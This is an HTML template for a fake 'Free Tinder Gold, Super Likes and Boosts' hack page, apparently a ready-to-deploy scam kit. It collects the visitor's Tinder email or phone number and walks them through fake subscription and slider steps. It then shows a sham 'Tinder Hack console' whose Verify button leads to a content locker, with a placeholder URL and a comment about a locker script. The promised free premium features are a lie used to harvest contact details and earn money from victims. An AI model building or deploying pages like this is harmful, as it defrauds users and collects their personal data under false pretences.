<!doctype html>
<html lang="en">
   <head>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
      <link rel="stylesheet" href="bootstrap.min.css">
      <link rel="stylesheet" href="devices.min.css">
      <link rel="stylesheet" href="nouislider.min.css">
      <link rel="stylesheet" href="main.css">
      <link rel="icon" type="image/x-icon" href="favicon.ico">
      <title>Free Tinder Gold, Super Likes and Boosts</title>
   </head>
   <body>
      <div class="device device-iphone-x">
         <div class="device-frame">
            <div class="device-content">
               <div class="FLICK">
                  <img class="tinder-top TT1 d-sm-none" src="top.jpg"><img class="tinder-top TT2 d-none d-sm-block" src="toptop.jpg">
                  <div class="FLICK2">
                     <div class="FLICK3">
                        <img src="logo.png" class="w-30 mb-3 mx-auto">

                      <article class="T1">

                        <h3 class="t-normal mb-0 LH0">Free <span class="t-bold">Tinder Gold</span><img src="gold-2.png" class="inline-TINDER-40">, <span class="t-bold">Super Likes</span><img src="superlike-2.png" class="inline-TINDER-40"> and <span class="t-bold">Boosts</span><img src="boost-2.png" class="inline-TINDER-40"></h3>
                        <h5 class="t-light"><span class="t-normal">Step 1: </span>Type in your Tinder Email/phone number.</h5>
                        <input type="text" class="form-control form-control-lg t-normal mb-1" id="tinder-ep" placeholder="Email/phone number">
                        <button type="button" class="btn btn-lg btn-block btn-light mb-1 mt-1 t-bold-i pt-2 pb-2" onclick="F1();">Continue</button>

                      </article>

                      <article class="T2">

                        <h5 class="t-light"><span class="t-normal">Step 2: </span>Choose which Tinder subscribtion you want to get.</h5>
                        <div class="accordion w-100" id="tinderSubscribtions">
                           <div class="card">
                              <div class="card-header" id="tinderPlus">
                                 <h2 class="mb-0"><button class="btn btn-block t-bold t-plus collapsed" type="button" data-toggle="collapse" data-target="#Plus" aria-expanded="false" aria-controls="Plus">Tinder Plus<img src="plus-2.png" class="inline-TINDER-35"></button></h2>
                              </div>
                              <div id="Plus" class="collapse" aria-labelledby="tinderPlus" data-parent="#tinderSubscribtions">
                                 <div class="card-body p-1"><img class="img-fluid" src="t-p-2.jpg"></div>
                              </div>
                           </div>
                           <div class="card">
                              <div class="card-header" id="tinderGold">
                                 <h2 class="mb-0"><button class="btn btn-block t-bold t-gold collapsed" type="button" data-toggle="collapse" data-target="#Gold" aria-expanded="false" aria-controls="Gold">Tinder Gold<img src="gold-2.png" class="inline-TINDER-35"></button></h2>
                              </div>
                              <div id="Gold" class="collapse" aria-labelledby="tinderGold" data-parent="#tinderSubscribtions">
                                 <div class="card-body p-1"><img class="img-fluid" src="t-g-2.jpg"></div>
                              </div>
                           </div>
                        </div>

                        <button type="button" class="btn btn-lg btn-block btn-light mb-1 mt-2 t-bold-i pt-2 pb-2 CWITH" onclick="F2();">Continue</button>

                      </article>

                      <article class="T3">

                        <h5 class="t-light"><span class="t-normal">Step 3: </span>How many <span class="t-bold">Super Likes</span><img src="superlike-2.png" class="inline-TINDER-275"> and <span class="t-bold">Boosts</span><img src="boost-2.png" class="inline-TINDER-275"> do you want?</h5>

                        <h3 class="SLSLSL mb-0"><span id="SLSL">250</span> Super Likes<img src="superlike-2.png" class="inline-TINDER-40"></h3>

                        <div id="SLslider" class="w-90 mx-auto mb-2"></div>

                        <h3 class="BBB mb-0"><span id="BB">50</span> Boosts<img src="boost-2.png" class="inline-TINDER-40"></h3>

                        <div id="Bslider" class="w-90 mx-auto mb-3"></div>

                        <button type="button" class="btn btn-lg w-90 mx-auto btn-light mb-1 mt-1 t-bold-i pt-2 pb-2" onclick="F3();">Continue</button>

                      </article>

                      <article class="T4">

                        <h2 class="t-normal"><span class="t-bold">Tinder Hack</span> console</h2>

                        <div id="PRO"></div>

                        <a id="verify-button" href="REPLACE YOUR CONTENT LOCKER URL HERE"> <button type="button" class="btn btn-lg btn-block btn-light mb-1 mt-1 t-bold-i pt-2 pb-2 VB" >Verify</button> </a>

                      </article>

                     </div>
                  </div>
                  <img class="tinder-bot" src="bot.jpg">
               </div>
            </div>
         </div>
         <div class="device-stripe"></div>
         <div class="device-header"></div>
         <div class="device-sensors"></div>
         <div class="device-btns"></div>
         <div class="device-power"></div>
      </div>

      <script src="jquery-3.4.1.min.js"></script>
      <script src="popper.min.js"></script>
      <script src="bootstrap.min.js"></script>
      <script src="nouislider.min.js"></script>
      <script src="progressbar.js"></script>
      <script src="main.js"></script>

      <!-- LOCKER SCRIPT WITH LOAD METHOD: ONCLICK -->
      <!-- HAVE A GOOD NEW YEAR ~FLICK -->

   </body>
</html>
